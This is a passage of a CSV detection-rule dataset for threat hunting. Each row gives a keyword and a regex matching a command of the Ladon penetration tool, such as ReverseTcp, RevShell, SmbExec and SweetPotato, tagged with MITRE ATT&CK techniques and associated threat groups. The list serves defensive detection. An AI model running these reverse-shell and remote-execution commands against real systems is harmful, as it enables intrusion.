loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50746" "*Ladon ReadFile *",".{0,1000}Ladon\sReadFile\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50747" "*Ladon RegAuto*",".{0,1000}Ladon\sRegAuto.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50748" "*Ladon ReverseHttps*",".{0,1000}Ladon\sReverseHttps.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50749" "*Ladon ReverseTcp *",".{0,1000}Ladon\sReverseTcp\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50750" "*Ladon RevShell-*",".{0,1000}Ladon\sRevShell\-.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50751" "*Ladon Runas*",".{0,1000}Ladon\sRunas.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50752" "*Ladon RunPS *",".{0,1000}Ladon\sRunPS\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50753" "*Ladon sc *",".{0,1000}Ladon\ssc\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50754" "*Ladon SetSignAuth*",".{0,1000}Ladon\sSetSignAuth.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50755" "*Ladon SmbExec *",".{0,1000}Ladon\sSmbExec\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50756" "*Ladon Sniffer*",".{0,1000}Ladon\sSniffer.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50757" "*Ladon SshExec *",".{0,1000}Ladon\sSshExec\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50758" "*Ladon SweetPotato*",".{0,1000}Ladon\sSweetPotato.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50759" "*Ladon TcpServer *",".{0,1000}Ladon\sTcpServer\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50760" "*Ladon 